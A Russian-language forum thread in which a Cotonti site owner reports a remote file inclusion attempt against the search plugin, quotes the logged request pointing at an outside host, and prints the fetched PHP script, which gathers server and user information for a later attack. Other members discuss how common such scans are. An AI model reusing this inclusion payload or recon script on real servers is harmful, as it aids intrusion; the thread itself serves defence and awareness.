Как нас взламывают
| Sain |
|
|---|---|
|
Доброго времени суток, уважаемые форумчане. Решил запустить проект на Котонти. Буквально на 3-й день после заливки скриптов на сервер, меня попытались хакнуть.
Как все начиналось. Заливая контент, заглянул в системный лог. Нашел там интересное сообщение системы безопасности: A variable type check failed, expecting G/ALP for 'tab' : http://201.134.249.164/intranet/on.txt? - /plug.php?e=search&tab=http://201.134.249.164/intranet/on.txt? Как видим, хакер инклуднуть в форму поиска вот этот скрипт: http://201.134.249.164/intranet/on.txt? Попробовал зайти по этому адресу, но Авира заблокировал доступ. После отключения антивируса скачал файлик. Вот его содержимое: <?php
closelog( );
$user = get_current_user( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$ver = phpversion( );
$gid = posix_getgid( );
if ($chdir == "") $chdir = getcwd( );
if(!$whoami)$whoami=exec("whoami");
?>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><span style="font-size: 9pt"><b>
<?= $info ?>
:</b> <?= $value ?></DIV></TD>
</TR>
<?php
}
?>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
<span style="font-size: 9pt"><b>
User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
<span style="font-size: 9pt"><b>
Current Path:</b> <?= $chdir ?></span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
<span style="font-size: 9pt"><b>
Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?>
</span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
<span style="font-size: 9pt"><b>
Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?>
</span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
<span style="font-size: 9pt"><b>
Server Address:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?>
</span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
<span style="font-size: 9pt"><b>
Script Current User:</b> <?= $user ?></span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
<span style="font-size: 9pt"><b>
PHP Version:</b> <?= $ver ?></span></DIV></TD>
</TR>
</TABLE>Инфа о серваке – половина успешного взлома. Так что заблокируйте доступ к серверу со следующих Ip: 201.134.249.164 – адрес, где скрипт для инклуда 204.236.*.* - подсеть хакера В разработке:
1) Платная подписка для групп (через вебмани) 2) Авторизация с помощью Swekey 3) Авторизация с помощью Yubikey 4) Шифрование авторизации |
| Yusupov |
|
|---|---|
|
Так Ваш сайт хакнули или нет?
|
| Sain |
|
|---|---|
|
В разработке:
1) Платная подписка для групп (через вебмани) 2) Авторизация с помощью Swekey 3) Авторизация с помощью Yubikey 4) Шифрование авторизации |
| Kort |
|
|---|---|
|
У меня такими хаками все логи забиты
SED.by - создание сайтов, разработка плагинов и тем для Котонти
|
| Sain |
|
|---|---|
# Kort : У меня такими хаками все логи забиты Эти инклуды являются типичным примером СЕ-атак(Command Execution Attack). В разработке:
1) Платная подписка для групп (через вебмани) 2) Авторизация с помощью Swekey 3) Авторизация с помощью Yubikey 4) Шифрование авторизации |
| Kort |
|
|---|---|
|
ясно. а я лет 5 уже мучаюсь вопросом
SED.by - создание сайтов, разработка плагинов и тем для Котонти
|
| Sain |
|
|---|---|
# Kort : ясно. а я лет 5 уже мучаюсь вопросом Главное, что б в инклуд файле не было руткида или чего-то такого. Не знаю, как старые версии Седитио, но Котонти от таких атак защищен. И это не может не радовать)) В разработке:
1) Платная подписка для групп (через вебмани) 2) Авторизация с помощью Swekey 3) Авторизация с помощью Yubikey 4) Шифрование авторизации |
| Alex300 |
|
|---|---|
|
У меня и на проектах, что на SED'е системный лог пестрит подобными записями. Десятки в день. Пока не сломали
 Есть миры, не здесь, там, где небеса горят, и моря засыпают, и реки дремлют; люди сделаны из дыма, а города – из песен. Где-то опасность, где-то несправедливость, даже где-то остыл чай. Идем Эйс, у нас много работы!...
...Sorry for my english... Бесплатные расширения для Cotonti: https://lily-software.com/free-scripts/ |
| Sain |
|
|---|---|
|
Дело в том, что раньше я писал сайты на РоР и ни разу в логах не встречал попытки СЕ-инклудов. По этой причине у меня возник вопрос, как хакеры так быстро вышли на новый проект (в сети всего 3 дня). Как считаете, может в коде Седитио была скрытая отправка инфы о инсталляции системы? Есть люди, которые просматривали весь код?
В разработке:
1) Платная подписка для групп (через вебмани) 2) Авторизация с помощью Swekey 3) Авторизация с помощью Yubikey 4) Шифрование авторизации |
| Trustmaster |
|
|---|---|
|
Нет никакой информации об инсталляции системы. А подобные атаки в автоматическом порядке организуются ботами и сканнерами сетевых уязвимостей.
May the Source be with you!
|
